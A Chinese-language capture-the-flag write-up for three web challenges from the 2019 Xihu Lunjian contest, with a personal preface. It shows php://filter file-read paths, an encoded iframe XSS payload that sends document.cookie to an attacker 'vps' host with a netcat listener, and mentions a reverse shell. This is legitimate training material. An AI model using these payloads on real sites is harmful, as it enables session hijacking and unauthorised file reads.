2019西湖論劍web wp


發在正文前

這應該是自己在安全圈摸爬滾打兩年多以來第一次正規的ctf比賽。沒解出flag,沒截圖,只提供了一些思路。

遙想往昔,初入大學,帶着對PT的向往,一個人穿行在幽暗的圖書館,翻閱啃讀一本本安全書籍(后來事實證明,純屬瞎折騰。在此也表達下對那些無師自通的大🐮深深的佩服之情),也從網上收集各種pt資源,棄高數而不學,視線代為無物,弱水三千唯愛我PT,雖晦澀難懂,學習過程舉步維艱,仍然孜孜不倦,越發尋不得,就越發令我向往,言之痴迷不過。

兜兜轉轉,踏上起點,已是大二之事,沒有多少竊喜,相反偶爾徒生黃花菜已涼之感,古人雲:詩酒趁年華,搞事要趁早。但我好像就像一只被歲月風干理想的咸魚(但也是一只不放棄掙扎的咸魚),最黯然莫過於在pt的路上踽踽獨行,偏離了大眾的道路,與眾生相悖而馳,更未曾看見想象中的美妙風景。但,老班長說過,“**就在眼前,夢想呢?也許在更前面一點。”我期待的精彩的世界,也許就在更前面一點,我期待的小伙伴,也許就在更前面一點。自己要用技術做出一番有意義的事情的願景會一直保留,萬一哪一天就實現了?

言歸正傳,承蒙學長辰厚重

,讓我得以完美打了一次醬油,在協會眾人的不懈努力下,最終還是沒進入決賽,拿了個66大吉。

自己給自己頒發一個ctfer的證書,之后的事,當然就是在ctfer圈風生水起,打下一片天地啦。○( ^皿^)っHiahiahia…

 

正文

babyt3(300)

說真,這題的難度本菜覺得與分值不符,差評。(然后大佬就說了:應該是出了非預期Bug)

打開鏈接,在正中處赫然看見

迫不及待告訴學長,說完之后立馬覺得自己傻Ⅹ。

讀取源碼:/?file=php://filter/read=convert.base64-encode/resource=index.php

繼續:/?file=php://filter/read=convert.base64-encode/resource=dir.php

查看根目錄:/dir.php?dir=/

 

太明顯了叭:/?file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4

得到flag

ps:

昨天看見一個大佬的博客,預期解應該是,第一步.DS_Store文件泄露。

 

 

breakout(300)

此題可分為拿cookie和利用cookie兩部分。

拿cookie

打開鏈接

message:

想了一下留言板處會出現的漏洞,最常見xss,sql注入

簡單fuzz:<script>....。直接被過濾了,有點此地無銀三百兩,這不是提醒我這就是xss嗎?

於是fuzz一通,過濾了<>里的內容和<>里的on事件,unicode可行,不知道啥用,於是跳到report。

report:

由於不知道第一個框框干嘛的,就先解決第二個框框,md5截斷比較,網上有腳本。

再填寫第一個框框的時候,隨便填寫,提示說不是它的網址,還是不知道干嘛的,跳到exec。

exec:

命令執行,但需要管理權限。

至此知道了message和url是干嘛的了,xss打管理cookie。

回到message,留言:<iframe src="&#x6a;avascript:window.location.href='http://vps:7777/?a='+document.cookie"

回到report,url填寫:http://ctf1.linkedbyx.com:10441/main.php

vps上監聽:nc -lvvp 7777

ok!拿到cookie:balabala

利用cookie

改本地cookie,執行命令,沒有“非管理”的提示了,說明權限認證成功,但沒顯示。在我正在懷疑思路是否正確之際,學長肯定地說,命令執行了,只是沒顯示。

好吧,學習了。

然后問了一下學長:

果然就是,關於反彈shell就不多談了,看這篇文章,至此flag到手。

在網上看見有人用了卡外帶的方法,卡外帶我也想到並試了,大概是姿勢不對,媽蛋,吃了經驗的虧!

 

猜猜flag是什么(300)

打開鏈接

一開始瘋狂sql注入,后來臨近崩潰才向學長求助。

學長提示

fo了!

網上隨便找個工具打開,打開后

訪問flag,提示沒那容易得到flag,顯然還需要通過別的操作.

至此直到game over也思路全無。

接着膜大佬的wp

用githack獲得一個壓縮包BackupForMySite.zip

用明文攻擊解開壓縮包,得到里面的code

 

之后去主頁面提交:

/?code=你找到的code

給了一個隨機數。
使用php_mt_seed

$ time ./php_mt_seed 你的隨機數

得到數字依次訪問:

/flag/得到的數字.txt

得flag

 

 

打開鏈接,啥都木有,然后就...沒思路了。,,ԾㅂԾ,,

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM